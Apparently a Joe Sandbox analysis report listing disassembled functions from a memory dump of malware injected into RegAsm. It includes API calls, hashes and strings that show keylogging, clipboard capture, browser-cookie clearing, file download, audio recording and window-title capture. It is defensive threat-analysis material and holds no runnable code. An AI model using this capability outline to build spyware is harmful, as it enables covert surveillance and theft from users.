                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetLastInputInfo$User32.dll
                                                                • API String ID: 2574300362-1519888992
                                                                • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __alldvrm$_strrchr
                                                                • String ID:
                                                                • API String ID: 1036877536-0
                                                                • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                Function 00456C9A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                                                • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                                                • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                                                Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction ID: b0a34e1ed6630e1fb57c9e62860a3601010315cd62f19612bff23542d182db60
                                                                • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                                                                • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                                                                Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                • String ID:
                                                                • API String ID: 3360349984-0
                                                                • Opcode ID: 3cc4a22492a47db64547c4b8535c962fb2b7a00fbf8ffb9522a706fb9bc5eda2
                                                                • Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
                                                                • Opcode Fuzzy Hash: 3cc4a22492a47db64547c4b8535c962fb2b7a00fbf8ffb9522a706fb9bc5eda2
                                                                • Instruction Fuzzy Hash: 684182B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                                Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                                                • Cleared browsers logins and cookies., xrefs: 0040C130
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                • API String ID: 3472027048-1236744412
                                                                • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                                                • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                                                                • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                                                Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                                                  • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                                                  • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                                                • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                                                • Sleep.KERNEL32(00000064), ref: 0040A638
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$SleepText$ForegroundLength
                                                                • String ID: [ $ ]
                                                                • API String ID: 3309952895-93608704
                                                                • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                Function 00443AD3 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                                • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                                                • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                                Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                                • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                                                • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                                Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad$ErrorLast
                                                                • String ID:
                                                                • API String ID: 3177248105-0
                                                                • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                Function 0041C516 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleReadSize
                                                                • String ID:
                                                                • API String ID: 3919263394-0
                                                                • Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                                • Opcode Fuzzy Hash: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
                                                                • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                                Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleOpenProcess
                                                                • String ID:
                                                                • API String ID: 39102293-0
                                                                • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                                                • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                                                                • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                                                Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                                  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                                • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                • String ID:
                                                                • API String ID: 2633735394-0
                                                                • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                                • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                                • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                                Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                                • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                                • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MetricsSystem
                                                                • String ID:
                                                                • API String ID: 4116985748-0
                                                                • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                                • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                                • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                                Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                                  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                • String ID:
                                                                • API String ID: 1761009282-0
                                                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                                Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHandling__start
                                                                • String ID: pow
                                                                • API String ID: 3213639722-2276729525
                                                                • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                                • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                                • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                                Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                • API String ID: 1881088180-3686566968
                                                                • Opcode ID: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                                • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                • Opcode Fuzzy Hash: ed48047f974fffac8e7a9b5da0f857699ac9eabc6e4f24e176e756ae766f8f96
                                                                • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ACP$OCP
                                                                • API String ID: 0-711371036
                                                                • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 481472006-1507639952
                                                                • Opcode ID: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                                • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                • Opcode Fuzzy Hash: 76d5dd6ecd4cf0ae01fc24a6e422c0d46a6680b11c9869ab6839a1ab8c86e845
                                                                • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32 ref: 0041667B
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadFileSleep
                                                                • String ID: !D@
                                                                • API String ID: 1931167962-604454484
                                                                • Opcode ID: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                • Opcode Fuzzy Hash: 9cbcf339d5782d21f0009647a5314bbf722ddb95791e80143436529d650ea742
                                                                • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                • API String ID: 481472006-2430845779
                                                                • Opcode ID: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                • Opcode Fuzzy Hash: 4182ea60a7d59cd3c4daa7da87bafc9d2ec88e2c779713b19cbff176a10afb6b
                                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: alarm.wav$hYG
                                                                • API String ID: 1174141254-2782910960
                                                                • Opcode ID: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                                • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                • Opcode Fuzzy Hash: a67f3d5249a1fb94c92f6e91cc59b1f19d843fcb2bd7b99b2c155253ed97e9bb
                                                                • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                • String ID: Online Keylogger Stopped
                                                                • API String ID: 1623830855-1496645233
                                                                • Opcode ID: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                • Opcode Fuzzy Hash: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferHeaderPrepare
                                                                • String ID: XMG
                                                                • API String ID: 2315374483-813777761
                                                                • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                                                • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
